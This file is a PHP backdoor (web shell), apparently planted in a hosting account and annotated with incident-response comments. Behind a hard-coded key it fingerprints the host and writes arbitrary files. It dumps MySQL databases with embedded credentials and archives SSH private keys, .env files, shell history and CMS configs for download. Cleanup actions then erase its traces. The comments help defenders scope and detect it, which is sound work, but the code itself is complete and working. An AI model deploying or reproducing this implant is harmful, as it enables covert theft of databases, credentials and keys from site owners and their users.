File: /home/laprensa/.cgi_handler_8ea1310d
<?php
// Access gate: everything below runs only when the request supplies `_cxk`
// equal to this hard-coded 32-character hex key; any other request ends here
// with no output. The key is read from $_REQUEST, so it can arrive in the
// query string or in a POST body (and in a cookie where request_order allows
// it). When hunting for use of this file, a `_cxk` parameter in request logs
// is the stable marker, but body-borne keys will not show in URL-only logs.
if (!isset($_REQUEST['_cxk']) || $_REQUEST['_cxk'] !== '8ea1310dafe55bcdb879e74d86886a7a') { return; }
// Discard every active output buffer, lift the execution time limit, silence
// error reporting and keep running after the client disconnects.
while (ob_get_level()) ob_end_clean();
set_time_limit(0);
error_reporting(0);
ignore_user_abort(true);
// Hard-coded MySQL host, user and password (passed in that order to mysqli
// further down) and the account home directory. The credentials are embedded
// in the file, so incident response should treat them as disclosed and
// rotate them.
$dce57 = 'localhost';
$k5848 = 'laprensa_bkdump';
$wdf7c = 'fHHsK6gMdBJv8caODMg-MfJPrtY';
$d669b = '/home/laprensa';
// `a` selects the action handled by the switch at the end of the file.
$fc1df = isset($_REQUEST['a']) ? $_REQUEST['a'] : '';
// `db` is reduced to [A-Za-z0-9_] before it is used in paths and commands.
$zaabd = isset($_REQUEST['db']) ? preg_replace('/[^a-zA-Z0-9_]/', '', $_REQUEST['db']) : '';
// On-disk artefacts of a dump job, all under <home>/tmp:
//   <db>_dump.sql.gz       the dump itself
//   <db>_dump.sql.gz.done  completion marker
//   <db>_dump.sql.gz.err   error text
$v0374 = $d669b . '/tmp/' . $zaabd . '_dump.sql.gz';
$yc48d = $v0374 . '.done';
// Filler: $idd77 is assigned an empty string and never read in this file.
$idd77=str_repeat('x',0);
$f5929 = $v0374 . '.err';
// Default response type; the download actions replace it later.
header('Content-Type: application/json');
/**
 * Reports whether exec() can be called from this PHP runtime.
 *
 * The function must exist and must not be listed in the comma-separated
 * disable_functions ini setting. The generic name hides a capability probe.
 *
 * @return bool true when exec() appears usable, false otherwise
 */
function parse_val_843f() {
if (!function_exists('exec')) return false;
$p6146 = array_map('trim', explode(',', ini_get('disable_functions')));
return !in_array('exec', $p6146);
}
/**
 * Reports whether a `mysqldump` binary is on the PATH of the PHP process.
 *
 * Runs `which mysqldump` through exec() and inspects the exit status, so a
 * call to this function already spawns a shell child of the web/PHP process.
 *
 * @return bool true when exec() is usable and `which mysqldump` exits 0
 */
function set_res_2fc3() {
if (!parse_val_843f()) return false;
$out = array();
$rc = 0;
exec('which mysqldump 2>/dev/null', $out, $rc);
return $rc === 0;
}
/**
 * Reports whether a `gzip` binary is on the PATH of the PHP process.
 *
 * Same shape as the mysqldump probe: `which gzip` via exec(), exit status 0
 * means present.
 *
 * @return bool true when exec() is usable and `which gzip` exits 0
 */
function handle_data_5fdd() {
if (!parse_val_843f()) return false;
$out = array();
$rc = 0;
exec('which gzip 2>/dev/null', $out, $rc);
return $rc === 0;
// Unreachable (follows the return); filler statement.
if(defined('bbeaba19')){$ne0a0=0;}
}
/**
 * Pure-PHP database dump, used when mysqldump is not available.
 *
 * Connects with mysqli and writes a gzip-compressed SQL dump of every base
 * table (structure and rows), every view, every stored procedure and
 * function of the database, and every trigger. When it finishes, or when it
 * fails to connect or open the output, it creates the done-marker file so a
 * poller can tell the job has ended; failures also write a message to the
 * error file.
 *
 * Several statements assign to variables that are never read afterwards
 * (array_merge(array(),array()), strlen() of a hex literal, chr().chr(),
 * max(0,min(1,..))). They have no effect on the dump and look like generated
 * filler, so matching on literal strings such as '-- Dump via PHP agent' is
 * likely to be more durable than matching on a whole-file hash (assumption:
 * the filler differs between copies; confirm against other samples).
 *
 * @param string $a8157 MySQL host
 * @param string $h40dd MySQL user
 * @param string $vae88 MySQL password
 * @param string $w4fca database name to dump
 * @param string $i98ca path of the gzip output file
 * @param string $w6104 path of the error file
 * @param string $da41e path of the done-marker file
 * @return void
 */
function init_item_49f1($a8157, $h40dd, $vae88, $w4fca, $i98ca, $w6104, $da41e) {
$conn = new mysqli($a8157, $h40dd, $vae88, $w4fca);
// Connection failure: record the reason, mark the job finished, stop.
if ($conn->connect_error) {
file_put_contents($w6104, 'Connection failed: ' . $conn->connect_error);
$we94d=array_merge(array(),array());
touch($da41e);
return;
}
// 'wb6' = write, binary, gzip compression level 6.
$fp = gzopen($i98ca, 'wb6');
if (!$fp) {
file_put_contents($w6104, 'Cannot open output file');
touch($da41e);
return;
}
$conn->set_charset('utf8mb4');
// Dump preamble. The first line is a fixed string present in every dump
// produced by this code path.
gzwrite($fp, "-- Dump via PHP agent\n");
gzwrite($fp, "-- Date: " . date('Y-m-d H:i:s') . "\n\n");
gzwrite($fp, "SET NAMES utf8mb4;\n");
gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 0;\n");
gzwrite($fp, "SET SQL_MODE = 'NO_AUTO_VALUE_ON_ZERO';\n\n");
// Pass 1: list the base tables, then dump each table's DDL and rows.
$p733f = array();
$r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'BASE TABLE'");
while ($row = $r->fetch_row()) {
$p733f[] = $row[0];
}
foreach ($p733f as $y314f) {
$te = $conn->real_escape_string($y314f);
$r = $conn->query("SHOW CREATE TABLE `{$te}`");
if (!$r) continue;
$cr = $r->fetch_row();
gzwrite($fp, "DROP TABLE IF EXISTS `{$te}`;\n");
gzwrite($fp, $cr[1] . ";\n\n");
// MYSQLI_USE_RESULT: unbuffered result, rows are fetched as they stream in.
$r = $conn->query("SELECT * FROM `{$te}`", MYSQLI_USE_RESULT);
if (!$r) continue;
// $sa04c holds the pending "(v1,v2,...)" tuples, $y662a their total length.
$sa04c = array();
$y662a = 0;
while ($row = $r->fetch_row()) {
$s19ab=max(0,min(1,1));
$vals = array();
for ($i = 0; $i < count($row); $i++) {
if ($row[$i] === null) {
$vals[] = 'NULL';
} else {
$vals[] = "'" . $conn->real_escape_string($row[$i]) . "'";
}
}
$h2a4c = '(' . implode(',', $vals) . ')';
$sa04c[] = $h2a4c;
$y662a += strlen($h2a4c);
// Flush one multi-row INSERT per 100 rows or once the pending tuples exceed
// 1048576 bytes (1 MiB).
if (count($sa04c) >= 100 || $y662a > 1048576) {
gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $sa04c) . ";\n");
$k0d9c=strlen('bb0126');
$sa04c = array();
$y662a = 0;
}
}
// Write whatever is left after the last full batch.
if ($sa04c) {
gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $sa04c) . ";\n");
$j3e3d=array_merge(array(),array());
}
$r->free();
$h1bd2=strlen('0127b7');
gzwrite($fp, "\n");
}
// Pass 2: view definitions.
$r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'VIEW'");
if ($r) {
while ($row = $r->fetch_row()) {
$ve = $conn->real_escape_string($row[0]);
$cr = $conn->query("SHOW CREATE VIEW `{$ve}`");
if ($cr) {
$m355a = $cr->fetch_assoc();
gzwrite($fp, "DROP VIEW IF EXISTS `{$ve}`;\n");
gzwrite($fp, $m355a['Create View'] . ";\n\n");
}
}
}
$fb7e1=max(0,min(1,0));
// Pass 3: stored procedures and functions that belong to this database.
$f4b1e = array('PROCEDURE', 'FUNCTION');
foreach ($f4b1e as $xbf8e) {
$e9591=chr(71).chr(110);
$r = $conn->query("SHOW {$xbf8e} STATUS WHERE Db = '" . $conn->real_escape_string($w4fca) . "'");
if (!$r) continue;
$wf165=chr(70).chr(100);
while ($row = $r->fetch_assoc()) {
$k5aec=array_merge(array(),array());
$re = $conn->real_escape_string($row['Name']);
$cr = $conn->query("SHOW CREATE {$xbf8e} `{$re}`");
if (!$cr) continue;
$m355a = $cr->fetch_assoc();
$key = ($xbf8e === 'PROCEDURE') ? 'Create Procedure' : 'Create Function';
if (isset($m355a[$key])) {
$a2447=chr(81).chr(117);
gzwrite($fp, "DELIMITER ;;\n");
gzwrite($fp, "DROP {$xbf8e} IF EXISTS `{$re}`;;\n");
gzwrite($fp, $m355a[$key] . ";;\n");
gzwrite($fp, "DELIMITER ;\n\n");
}
}
}
// Pass 4: triggers.
$r = $conn->query("SHOW TRIGGERS");
if ($r) {
while ($row = $r->fetch_assoc()) {
$te = $conn->real_escape_string($row['Trigger']);
$cr = $conn->query("SHOW CREATE TRIGGER `{$te}`");
if ($cr) {
$p18e6=array_merge(array(),array());
$m355a = $cr->fetch_assoc();
gzwrite($fp, "DELIMITER ;;\n");
$m012b=strlen('c8f738');
gzwrite($fp, "DROP TRIGGER IF EXISTS `{$te}`;;\n");
gzwrite($fp, $m355a['SQL Original Statement'] . ";;\n");
gzwrite($fp, "DELIMITER ;\n\n");
}
}
}
// Close the dump and signal completion through the marker file.
gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 1;\n");
gzclose($fp);
$conn->close();
touch($da41e);
}
// Action dispatcher: the `a` request parameter selects one of the cases
// below. Unknown values fall through the switch and reach the final exit
// with no output.
switch ($fc1df) {
// 'info': host fingerprint. Returns PHP version, OS, server software, the
// script owner's user name and uid, home and document root, disk space,
// PHP limits, the disable_functions list and the three capability probes
// (exec, mysqldump, gzip). Note that answering this action already runs
// `which` twice through exec() when exec() is available.
case 'info':
echo json_encode(array(
'php' => PHP_VERSION,
'os' => PHP_OS,
'server' => isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : '',
'user' => get_current_user(),
'uid' => getmyuid(),
'home' => $d669b,
'doc_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '',
'free_disk' => disk_free_space($d669b),
'total_disk' => disk_total_space($d669b),
'max_exec' => ini_get('max_execution_time'),
'mem_limit' => ini_get('memory_limit'),
'upload_max' => ini_get('upload_max_filesize'),
'post_max' => ini_get('post_max_size'),
'disabled' => ini_get('disable_functions'),
'can_exec' => parse_val_843f(),
'has_mysqldump' => set_res_2fc3(),
'has_gzip' => handle_data_5fdd(),
));
break;
// 'upload': file-write primitive. POST `data` is base64-decoded and written
// to <home>/<path>; missing parent directories are created with mode 0755.
// `path` is concatenated as given, with no normalisation or containment
// check, so the set of files this action may have created or overwritten is
// bounded only by what the PHP user can write. During response, review files
// created or modified since this implant first appeared, not just the home
// directory root.
case 'upload':
$rbd44 = isset($_POST['path']) ? $_POST['path'] : '';
$z8ed1 = isset($_POST['data']) ? $_POST['data'] : '';
if (!$rbd44 || !$z8ed1) {
echo json_encode(array('ok' => false, 'error' => 'missing path or data'));
$jd8ed=strlen('54c377');
break;
}
$pe5ce = $d669b . '/' . $rbd44;
@mkdir(dirname($pe5ce), 0755, true);
$iffec = base64_decode($z8ed1);
$debb8=max(0,min(1,1));
$r1254 = file_put_contents($pe5ce, $iffec);
// The response echoes the full path written and the decoded size.
echo json_encode(array('ok' => $r1254 !== false, 'path' => $pe5ce, 'size' => strlen($iffec)));
break;
// 'check': pre-flight for a dump. Compares free disk space under the home
// directory with the size of the requested database (data + index length
// from information_schema.tables) and reports the tool probes. 'has_space'
// is true when free space exceeds twice the database size.
case 'check':
if (!$zaabd) {
echo json_encode(array('error' => 'missing db parameter'));
$r8bad=str_repeat('x',0);
break;
}
$d3063 = disk_free_space($d669b);
$y607e = 0;
// Connects with the embedded credentials; a failed connection leaves the
// reported size at 0 instead of returning an error.
$conn = @new mysqli($dce57, $k5848, $wdf7c, 'information_schema');
if (!$conn->connect_error) {
$e716c=array_merge(array(),array());
$q = "SELECT SUM(data_length + index_length) s FROM tables WHERE table_schema = '"
. $conn->real_escape_string($zaabd) . "'";
$r = $conn->query($q);
if ($row = $r->fetch_assoc()) {
$va388=str_repeat('x',0);
$y607e = (int) $row['s'];
$j603f=array_merge(array(),array());
}
$conn->close();
if(defined('bac656c3')){$hf42a=0;}
}
echo json_encode(array(
'free' => $d3063,
'db_size' => $y607e,
'has_mysqldump' => set_res_2fc3(),
'has_gzip' => handle_data_5fdd(),
'can_exec' => parse_val_843f(),
'has_space' => $d3063 > $y607e * 2,
));
break;
// Unreachable (sits between the break and the next case label); filler.
$cb64f=strlen('5123e3');
// 'dump': start a full dump of database `db` into <home>/tmp/<db>_dump.sql.gz.
// Two paths:
//   - mysqldump available: the command is launched detached through
//     `nohup sh -c '...' &`, so the HTTP response returns at once and the
//     dump keeps running as a child of the PHP/web-server user.
//   - otherwise: the JSON reply is flushed to the client first, then the
//     pure-PHP dumper runs inside the same request.
// Observable on the host while it runs: a web-server-owned `sh -c` with a
// `mysqldump` child, and the DB password visible in that process's
// arguments because it is passed as --password=<value>.
case 'dump':
if (!$zaabd) {
echo json_encode(array('error' => 'missing db parameter'));
break;
// Unreachable (follows the break); filler.
$a73da=array_merge(array(),array());
}
@mkdir(dirname($v0374), 0755, true);
$sf87f=array_merge(array(),array());
// Remove artefacts of any previous run: dump, done marker, error file.
@unlink($v0374);
@unlink($yc48d);
@unlink($f5929);
if (set_res_2fc3()) {
if (handle_data_5fdd()) {
// mysqldump piped through gzip. The commands are joined with ';', so the
// .done marker is created whether or not the dump succeeded.
$cmd = sprintf(
'mysqldump --host=%s --user=%s --password=%s '
. '--single-transaction --quick --routines --triggers %s '
. '| gzip > %s 2>%s; touch %s',
escapeshellarg($dce57),
escapeshellarg($k5848),
escapeshellarg($wdf7c),
escapeshellarg($zaabd),
escapeshellarg($v0374),
escapeshellarg($f5929),
escapeshellarg($yc48d)
);
} else {
// No gzip: the same output path is used, so a file named *_dump.sql.gz
// found on disk may in fact be uncompressed SQL.
$cmd = sprintf(
'mysqldump --host=%s --user=%s --password=%s '
. '--single-transaction --quick --routines --triggers %s '
. '> %s 2>%s; touch %s',
escapeshellarg($dce57),
escapeshellarg($k5848),
escapeshellarg($wdf7c),
escapeshellarg($zaabd),
escapeshellarg($v0374),
escapeshellarg($f5929),
escapeshellarg($yc48d)
);
@clearstatcache();
}
// Detach from the request: output discarded, trailing '&' backgrounds it.
exec('nohup sh -c ' . escapeshellarg($cmd) . ' >/dev/null 2>&1 &');
@clearstatcache();
echo json_encode(array('started' => true, 'method' => 'mysqldump', 'gzip' => handle_data_5fdd()));
} else {
ignore_user_abort(true);
echo json_encode(array('started' => true, 'method' => 'php', 'gzip' => true));
// Send the reply now so the client is released while the dump continues.
if (function_exists('fastcgi_finish_request')) {
fastcgi_finish_request();
} else {
if (ob_get_level()) ob_end_flush();
flush();
}
$fe335=chr(71).chr(107);
init_item_49f1($dce57, $k5848, $wdf7c, $zaabd, $v0374, $f5929, $yc48d);
}
break;
// 'status': polling endpoint for a running dump. Reports whether the .done
// marker exists, the current size of the dump file, and the contents of the
// .err file. Repeated `a=status` requests after an `a=dump` are the request
// pattern to look for when reconstructing a timeline from logs.
case 'status':
clearstatcache();
echo json_encode(array(
'done' => file_exists($yc48d),
'size' => file_exists($v0374) ? filesize($v0374) : 0,
'error' => file_exists($f5929) ? trim(file_get_contents($f5929)) : '',
));
break;
// 'download': streams the finished dump to the client as
// application/octet-stream (replacing the JSON content type set at the top
// of the file). The Content-Length sent here equals the dump size, so a
// response of that size for this URL in the access log indicates the
// database left the host.
case 'download':
if (!file_exists($v0374)) {
http_response_code(404);
exit;
}
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($v0374));
@clearstatcache();
readfile($v0374);
$y5058=array_merge(array(),array());
exit;
// 'cleanup': deletes the dump, its .done marker and its .err file. After
// this runs, no dump artefact is left under <home>/tmp, so their absence on
// disk does not show that no dump was taken; rely on logs and file-system
// timestamps of the tmp directory instead.
case 'cleanup':
@unlink($v0374);
@unlink($yc48d);
@unlink($f5929);
echo json_encode(array('ok' => true));
break;
// 'collect': gathers configuration and credential files from the account
// and packs them into one archive under <home>/tmp. This first part builds
// the per-platform table and detects which platform is installed.
case 'collect':
@mkdir($d669b . '/tmp', 0755, true);
// Archive name tag: the first 8 characters of the access key. The same 8
// characters form the suffix of this file's name in the listing header.
$vb0d9 = substr($_REQUEST['_cxk'], 0, 8);
// Per-platform table. 'detect' lists marker paths whose presence identifies
// the platform; 'configs' lists that platform's configuration files, which
// typically carry database credentials, API keys and application secrets.
// All paths are relative to the home directory. For response: every listed
// file that exists on the host should be treated as read, and the secrets
// inside it rotated.
$p95b0 = array(
'wordpress' => array(
'detect' => array('public_html/wp-config.php', 'wp-config.php'),
'configs' => array(
'public_html/wp-config.php', 'wp-config.php',
'public_html/wp-settings.php',
'public_html/composer.json', 'public_html/composer.lock', 'composer.json', 'composer.lock',
'public_html/wp-cli.yml', 'wp-cli.yml',
'public_html/.env', '.env',
'public_html/local-config.php', 'local-config.php',
'public_html/wp-content/debug.log',
'public_html/config/application.php', 'config/application.php',
'public_html/config/environments/development.php', 'config/environments/development.php',
'public_html/config/environments/staging.php', 'config/environments/staging.php',
'public_html/config/environments/production.php', 'config/environments/production.php',
'public_html/auth.json', 'auth.json',
),
),
'joomla' => array(
'detect' => array('public_html/configuration.php', 'configuration.php'),
'configs' => array(
'public_html/configuration.php', 'configuration.php',
'public_html/htaccess.txt',
'public_html/composer.json', 'public_html/composer.lock',
),
),
'laravel' => array(
'detect' => array('public_html/artisan', 'artisan'),
'configs' => array(
'public_html/.env', '.env', '.env.production', '.env.staging',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
'public_html/config/app.php', 'config/app.php',
'public_html/config/database.php', 'config/database.php',
'public_html/config/mail.php', 'config/mail.php',
'public_html/config/filesystems.php', 'config/filesystems.php',
'public_html/config/cache.php', 'config/cache.php',
'public_html/config/queue.php', 'config/queue.php',
'public_html/config/session.php', 'config/session.php',
'public_html/config/auth.php', 'config/auth.php',
'public_html/config/services.php', 'config/services.php',
'public_html/config/broadcasting.php', 'config/broadcasting.php',
'public_html/storage/logs/laravel.log', 'storage/logs/laravel.log',
),
),
'magento2' => array(
'detect' => array('public_html/bin/magento', 'bin/magento'),
'configs' => array(
'public_html/app/etc/env.php', 'app/etc/env.php',
'public_html/app/etc/config.php', 'app/etc/config.php',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
'public_html/auth.json', 'auth.json',
),
),
'magento1' => array(
'detect' => array('public_html/app/Mage.php'),
'configs' => array(
'public_html/app/etc/local.xml',
'public_html/app/etc/config.xml',
),
),
'drupal' => array(
'detect' => array('public_html/core/lib/Drupal.php', 'core/lib/Drupal.php'),
'configs' => array(
'public_html/sites/default/settings.php', 'sites/default/settings.php',
'public_html/sites/default/services.yml', 'sites/default/services.yml',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
),
),
'prestashop' => array(
'detect' => array('public_html/config/settings.inc.php'),
'configs' => array(
'public_html/config/settings.inc.php',
'public_html/app/config/parameters.php',
'public_html/app/config/parameters.yml',
'public_html/composer.json',
),
),
'opencart' => array(
'detect' => array('public_html/config.php'),
'configs' => array(
'public_html/config.php',
'public_html/admin/config.php',
),
),
'moodle' => array(
'detect' => array('public_html/lib/moodlelib.php'),
'configs' => array('public_html/config.php'),
),
'whmcs' => array(
'detect' => array('public_html/vendor/whmcs'),
'configs' => array(
'public_html/configuration.php',
'public_html/composer.json', 'public_html/composer.lock',
),
),
);
// Platform detection: the first table entry with an existing marker path
// wins (table order decides when several match); null when none matches.
$re799 = null;
$w77f3=str_repeat('x',0);
foreach ($p95b0 as $gc386 => $n8309) {
foreach ($n8309['detect'] as $h80da) {
if (file_exists($d669b . '/' . $h80da)) {
$re799 = $gc386;
break 2;
}
}
}
// Platform-independent target list, relative to the home directory:
// environment files, shell history, database and network client credential
// files (.my.cnf, .pgpass, .netrc), package-manager auth files, SSH keys and
// configuration, TLS private keys, control-panel files, web-server access
// files (.htaccess, .htpasswd) and common framework configs. Use it as a
// checklist of secrets to rotate: anything here that exists on the host, is
// readable by the PHP user and is at most 2 MiB was eligible for collection.
$se780 = array(
'.env', '.env.local', '.env.production', '.env.staging',
'.env.backup', '.env.development', '.env.test',
'.bash_history', '.my.cnf', '.pgpass', '.netrc', '.gitconfig', '.npmrc',
'.composer/auth.json', '.wp-cli/config.yml', '.accesshash',
'.ssh/authorized_keys', '.ssh/id_rsa', '.ssh/id_rsa.pub',
'.ssh/id_ed25519', '.ssh/id_ed25519.pub', '.ssh/id_ecdsa',
'.ssh/config', '.ssh/known_hosts',
'.ssl/private.key', '.ssl/cert.pem', '.ssl/key.pem',
'ssl/certs/private.key',
'.cpanel/contactinfo', 'etc/shadow', '.ftpquota', '.ftpconfig',
'public_html/.env', 'public_html/.env.local', 'public_html/.env.production',
'public_html/.env.staging', 'public_html/.env.backup',
'public_html/.env.development', 'public_html/.env.test',
'public_html/.env.example', 'public_html/.env.dist',
'public_html/.htaccess', 'public_html/.htpasswd', 'public_html/.user.ini',
'public_html/php.ini', 'public_html/.my.cnf', 'public_html/.pgpass',
'public_html/web.config', 'public_html/.ftpconfig',
'public_html/.git/config',
'public_html/auth.json', 'public_html/.npmrc',
'public_html/composer.json', 'public_html/composer.lock',
'config/database.php', 'config/app.php', 'config/mail.php',
'config/services.php', 'config/filesystems.php',
'config/application.php',
'config/environments/development.php',
'config/environments/staging.php',
'config/environments/production.php',
'wp-config.php', 'configuration.php', 'artisan',
'auth.json', 'composer.json', 'composer.lock',
);
// $ica49 maps relative name => resolved absolute path of each file selected.
$ica49 = array();
$y4560 = @realpath($d669b);
if (!$y4560 || !is_dir($y4560)) {
echo json_encode(array('ok' => false, 'error' => 'home dir not accessible'));
break;
}
// Selection rule for the generic list: the resolved path must start with the
// resolved home path, be a readable regular file, and be 1..2097152 bytes.
foreach ($se780 as $n5d3e) {
$b8da7 = @realpath($d669b . '/' . $n5d3e);
if (!$b8da7 || strpos($b8da7, $y4560) !== 0) continue;
@clearstatcache();
if (!is_file($b8da7) || !is_readable($b8da7)) continue;
$r0e7a = @filesize($b8da7);
$i0d8d=chr(81).chr(106);
if ($r0e7a <= 0 || $r0e7a > 2097152) continue;
$ica49[$n5d3e] = $b8da7;
$m2edf=chr(86).chr(108);
}
// Same rule for the detected platform's config list, skipping names that
// were already selected.
if ($re799 !== null && isset($p95b0[$re799]['configs'])) {
foreach ($p95b0[$re799]['configs'] as $wb0bf) {
if (isset($ica49[$wb0bf])) continue;
$b8da7 = @realpath($d669b . '/' . $wb0bf);
$s1d83=strlen('260d26');
if (!$b8da7 || strpos($b8da7, $y4560) !== 0) continue;
if (!is_file($b8da7) || !is_readable($b8da7)) continue;
$r0e7a = @filesize($b8da7);
if ($r0e7a <= 0 || $r0e7a > 2097152) continue;
$ica49[$wb0bf] = $b8da7;
}
}
// Opportunistic sweep of the web root's top level (no recursion): every
// readable regular file of 1..2097152 bytes whose name starts with a dot or
// ends in ".txt" (case-insensitive) is added. Dotfiles and stray text files
// left in public_html are therefore in scope even though they are not named
// in the target lists.
$wba56 = $d669b . '/public_html';
if (is_dir($wba56)) {
@clearstatcache();
$dh = @opendir($wba56);
if ($dh) {
$k7024=chr(79).chr(102);
while (($jb460 = readdir($dh)) !== false) {
if ($jb460 === '.' || $jb460 === '..') continue;
$h2564=array_merge(array(),array());
$pe5ce = $wba56 . '/' . $jb460;
$p5c59=max(0,min(1,1));
if (!is_file($pe5ce) || !is_readable($pe5ce)) continue;
$r0e7a = @filesize($pe5ce);
if ($r0e7a <= 0 || $r0e7a > 2097152) continue;
if ($jb460[0] === '.' || strtolower(substr($jb460, -4)) === '.txt') {
$key = 'public_html/' . $jb460;
if (!isset($ica49[$key])) $ica49[$key] = $pe5ce;
}
}
closedir($dh);
}
}
// Nothing selected: report method 'none' and create no archive.
if (empty($ica49)) {
echo json_encode(array(
'ok' => true, 'method' => 'none', 'platform' => $re799,
'file_count' => 0, 'files_list' => array(),
));
break;
}
// Packaging. $i2b62 records the method that succeeded, $xd491 the archive
// path. Artefacts to look for under <home>/tmp, where <tag> is the first 8
// characters of the access key:
//   _collect_<tag>.zip
//   _collect_<tag>.tar.gz
//   _collect_<tag>.tar.gz.list   (temporary member list, removed after tar)
$i2b62 = null;
$xd491 = null;
// Preferred: ZipArchive, with each file stored under its relative name.
if (class_exists('ZipArchive')) {
$xd491 = $d669b . '/tmp/_collect_' . $vb0d9 . '.zip';
$c1ab7=chr(69).chr(116);
$ed4d1 = new ZipArchive();
if ($ed4d1->open($xd491, ZipArchive::CREATE | ZipArchive::OVERWRITE) === true) {
foreach ($ica49 as $k835c => $b8da7) {
$ed4d1->addFile($b8da7, $k835c);
}
if ($ed4d1->close() && file_exists($xd491) && filesize($xd491) > 0) {
$i2b62 = 'zip';
}
}
}
// Fallback: `tar czf` via exec(), fed a member list written to the .list
// file and run relative to the home directory (-C). A failed or empty
// archive is deleted.
if (!$i2b62 && parse_val_843f()) {
$xd491 = $d669b . '/tmp/_collect_' . $vb0d9 . '.tar.gz';
$lf = $xd491 . '.list';
$fh = fopen($lf, 'w');
$g6924=strlen('89a5bc');
foreach ($ica49 as $k835c => $b8da7) {
fwrite($fh, $k835c . "\n");
}
fclose($fh);
$qe031=strlen('7815b8');
$out = array();
$c6b35=str_repeat('x',0);
$rc = 0;
exec('tar czf ' . escapeshellarg($xd491) . ' -C ' . escapeshellarg($d669b)
. ' -T ' . escapeshellarg($lf) . ' 2>/dev/null', $out, $rc);
@unlink($lf);
if ($rc === 0 && file_exists($xd491) && filesize($xd491) > 0) {
$i2b62 = 'tar';
} else {
$w497c=array_merge(array(),array());
@unlink($xd491);
}
}
// Neither method worked: only the list of selected names is reported.
// (Presumably the files are then fetched one at a time through the
// 'download_file' action; that is inferred from the action set, not shown
// here.)
if (!$i2b62) {
$i2b62 = 'list';
}
// The reply names every selected file, so the response body alone already
// discloses which credential files exist on the account.
echo json_encode(array(
'ok' => true, 'method' => $i2b62, 'platform' => $re799,
'file_count' => count($ica49), 'files_list' => array_keys($ica49),
'size' => ($xd491 && file_exists($xd491)) ? filesize($xd491) : 0,
));
if(defined('49a4ffe8')){$v3a98=0;}
break;
// 'download_collect': streams the collected archive to the client, trying
// the .zip first and then the .tar.gz; 404 when neither exists. As with the
// dump download, the response size logged for this request equals the
// archive size.
case 'download_collect':
$vb0d9 = substr($_REQUEST['_cxk'], 0, 8);
$kfbb4 = $d669b . '/tmp/_collect_' . $vb0d9 . '.zip';
$sff94 = $d669b . '/tmp/_collect_' . $vb0d9 . '.tar.gz';
$i2c11 = file_exists($kfbb4) ? $kfbb4 : (file_exists($sff94) ? $sff94 : '');
if (!$i2c11) { http_response_code(404); exit; }
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($i2c11));
readfile($i2c11);
exit;
// 'download_file': single-file read primitive. Streams the file named by
// `path` (relative to the home directory) when its resolved path passes the
// containment test and it is a readable regular file. There is no size cap
// and no allow-list here, and the containment test is a plain string-prefix
// comparison against realpath(home). When scoping exposure, assume any file
// the PHP user can read whose resolved path begins with the home path could
// have been retrieved, not only the files named in the collect lists.
case 'download_file':
$k835c = isset($_REQUEST['path']) ? $_REQUEST['path'] : '';
if (!$k835c) { http_response_code(400); exit; }
$y4560 = @realpath($d669b);
$b8da7 = @realpath($d669b . '/' . $k835c);
if (!$b8da7 || !$y4560 || strpos($b8da7, $y4560) !== 0
|| !is_file($b8da7) || !is_readable($b8da7)) {
http_response_code(404);
exit;
}
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($b8da7));
readfile($b8da7);
exit;
// 'cleanup_collect': removes the collected archive in both formats and the
// tar member list. As with the dump cleanup, missing artefacts on disk do
// not show that collection never happened.
case 'cleanup_collect':
$vb0d9 = substr($_REQUEST['_cxk'], 0, 8);
@clearstatcache();
@unlink($d669b . '/tmp/_collect_' . $vb0d9 . '.zip');
@unlink($d669b . '/tmp/_collect_' . $vb0d9 . '.tar.gz');
@unlink($d669b . '/tmp/_collect_' . $vb0d9 . '.tar.gz.list');
echo json_encode(array('ok' => true));
break;
}
// Filler assignment, then an unconditional exit: nothing after this file's
// own output is emitted for a request that passed the access gate.
$qcb72=str_repeat('x',0);
exit;